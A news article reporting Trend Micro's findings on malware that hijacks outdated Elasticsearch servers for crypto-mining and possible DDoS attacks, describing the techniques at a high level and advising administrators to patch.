Aggressive malware turns search engine into crypto mining botnet

Getting your Trinity Audio player ready...

An aggressive type of malware is threatening to undermine enterprise search engine Elasticsearch, turning it into a sophisticated zombie crypto-mining botnet.

The malware, described by cybersecurity company Trend Micro, would result in a botnet that could be used in distributed denial of service (DDoS) attacks by launching sequential attacks on public-facing servers running outdated versions of the search engine software.

According to the security researchers, the majority of these types of attacks have been run on a commercial basis, despite the attacks themselves being “relatively straightforward” to execute.

“Many of the malicious traffic or attacks that we see targeting Elasticsearch are relatively straightforward, and more often than not, profit-driven,” the Trend Micro post noted. “An attacker looks for unsecure or misconfigured servers or exploit old vulnerabilities, then drop the final payloads that typically consist of cryptocurrency-mining malware or even ransomware.”

The malware works by firstly identifying out of date servers, which it can force to download and execute the offending scripts. According to Trend Micro, this sets the present malware apart from other similar malicious scripts.

Worryingly, they suggest this also makes the hacks harder to detect.

“The ways that the scripts are retrieved are notable…Using expendable domains, for instance, allows the attackers to swap URLs as soon as they are detected,” researchers said.

According to Trend Micro, these elements of the malware should be seen as a “red flag” that could suggest much more substantial attacks are on the way:

That the cybercriminals (or threat actors) behind this attack used URL encoding, staged where the scripts are retrieved, and compromised legitimate websites could mean they are just testing their hacking tools or readying their infrastructure before mounting actual attacks.

If this turns out to be the case, the results could be devastating for those servers affected. By forcing control of the servers, which are then used to mine cryptocurrency, the hackers have a strong commercial incentive to pull off this type of attack.

Server administrators running Elasticsearch are being warned to patch software without delay, as well as tweaking their security settings to prevent this type of attack from taking hold.

But for some, these warnings will undoubtedly be heard too late.